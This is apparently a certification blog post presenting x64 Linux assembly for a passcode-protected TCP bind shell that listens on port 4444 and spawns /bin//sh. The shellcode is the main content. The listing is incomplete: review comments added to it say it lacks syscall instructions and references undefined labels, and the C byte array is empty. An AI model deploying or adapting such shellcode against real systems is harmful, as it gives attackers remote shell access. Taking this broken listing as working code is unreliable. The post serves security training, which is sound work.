sábado, 24 de mayo de 2014

[SLAEx64] tcp_bind_shell with passcode

Source: SecurityTube

This is an x64 TCP bind shell with a passcode. If you need more explanation, please check my post about the x32 bind shell, where you can find the man pages on *nix socket programming.

shell asm source

;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes

global _start
section .text
; ---------------------------------------------------------------------------
; Linux x86-64 TCP bind shell with an 8-byte passcode (NASM / Intel syntax,
; raw syscalls, no libc).  Syscall chain as written: socket -> bind -> listen
; -> accept -> read -> passcode compare -> exit | dup2 x3 -> execve.
; Registers follow the Linux syscall ABI: rax = number, args in rdi, rsi, rdx.
; Constants are loaded via push byte / pop and byte- or word-sized moves so
; the encoding contains no zero bytes (175 bytes per the header comment above).
; NOTE(review): as extracted, this listing contains no `syscall` instructions,
; and none of the labels it references (`_start`, `accepted_passwd`,
; `dup2_loop`) are defined here; it is an incomplete transcription, not an
; assemblable unit.  Read it as documentation of the intended call sequence.
; ---------------------------------------------------------------------------
    ; --- socket(AF_INET, SOCK_STREAM, 0) -> rax = listening fd ---
    push byte 0x29 ; 41 - socket syscall
    pop rax
    push byte 0x02 ; AF_INET
    pop rdi 
    push byte 0x01 ; SOCK_STREAM
    pop rsi
    ;copy socket descriptor to rdi for future use
    xchg rdi, rax
    ; --- build struct sockaddr_in on the stack (8 of its 16 bytes) ---
    ; layout below rsp: [rsp-8] sin_family, [rsp-6] sin_port, [rsp-4] sin_addr;
    ; sin_zero (8 bytes) and the high byte of sin_family are never written here.
    xor rax, rax
    mov dword [rsp-4], eax    ;INADDR_ANY
    mov word  [rsp-6], 0x5c11 ;PORT 4444 (0x115c in network byte order)
    mov byte  [rsp-8], 0x2    ;AF_INET
    sub rsp, 0x8              ; rsp now points at the struct
    ; --- bind(fd, &sockaddr, 16) ---
    push byte 0x31 ;49 bind
    pop rax 
    mov rsi, rsp
    ; only the low byte of rdx is written; this relies on the upper bytes of
    ; rdx already being 0, which nothing visible in this listing establishes
    add dl, 16 ;len
    ; --- listen(fd, backlog) ---
    push byte 0x32 ;listen
    pop rax
    ; the backlog lines are disabled, so rsi still holds the sockaddr pointer
    ; from bind and that value is what gets passed as the backlog
    ;push byte 0x02 ;max clients
    ;pop rsi
    ; --- accept(fd, &addr, &addrlen) -> rax = client fd ---
    push byte 0x2b ; accept
    pop rax
    sub rsp, 0x10  ; adjust: 16-byte out buffer for the peer address
    xor rsi, rsi    
    mov rsi, rsp ; pointer to that buffer (the xor above is redundant)
    mov byte [rsp-1], 0x10 ;len
    sub rsp, 0x01   ; adjust
    mov rdx, rsp ; pointer to the addrlen byte
    ;read buffer
    ; --- read(client_fd, buf, count); the client fd is accept's return in rax ---
    mov rdi, rax ; socket
    xor rax, rax
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
    ; NOTE(review): rdx was last loaded with the addrlen stack pointer above,
    ; so the "0" in the author's comment is not established by this listing
    push rdx ; 0 stdin
    lea rsi, [rsp-0x10] ; 16 bytes from buffer
    add dl, 0x10        ; len: again only the low byte of rdx is changed
    ;test passcode
    ; --- compare the first 8 bytes received against the fixed passcode ---
    ; the passcode sits in clear text in the payload; for defenders, this
    ; 8-byte literal and the /bin//sh constant below are stable byte patterns
    ; of this sample
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare rax with the qword at [rdi] (rdi += 8)
    jz accepted_passwd          ; jump if equal (label not defined in this listing)
    ;exit if different :P
    ; --- exit(): rax = 60 ---
    xor rax, rax 
    add al, 60


    ; --- dup2(client_fd, n) for n = 2, 1, 0 ---
    ; presumably the `accepted_passwd` target; rsi counts down 3 -> 0
    pop rdi; socket
    push byte 0x03
    pop rsi

    ; presumably the `dup2_loop` target; the jnz below reads the flags set by
    ; this dec (push/pop do not alter flags)
    dec rsi
    push byte 0x21 ;33 dup2
    pop rax
    jnz dup2_loop ; jump if not 0 (label not defined in this listing)

    ; --- execve("/bin//sh", ["/bin//sh", NULL], NULL) ---
    push rsi; 0 (rsi is 0 once the loop above falls through) -> NULL
    ;push /bin//sh in reverse
    mov rbx, 0x68732f2f6e69622f ; "/bin//sh" as 8 little-endian bytes, no NUL
    push rbx
    mov rdi, rsp ; rdi = pathname
    push rsi     ; NULL
    mov rdx, rsp ; envp = pointer to NULL
    push rdi 
    mov rsi, rsp ; argv = [pathname, NULL]
    push byte 0x3b ;59 execve
    pop rax

C output

unsigned char code[] =\


Correct passwd

Incorrect passwd

This shellcode was accepted to shell-storm.org and can be found here; special thanks to @JonathanSalwan for accepting it :)

SLAE64 - 1322

This blog post has been created to complete the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64
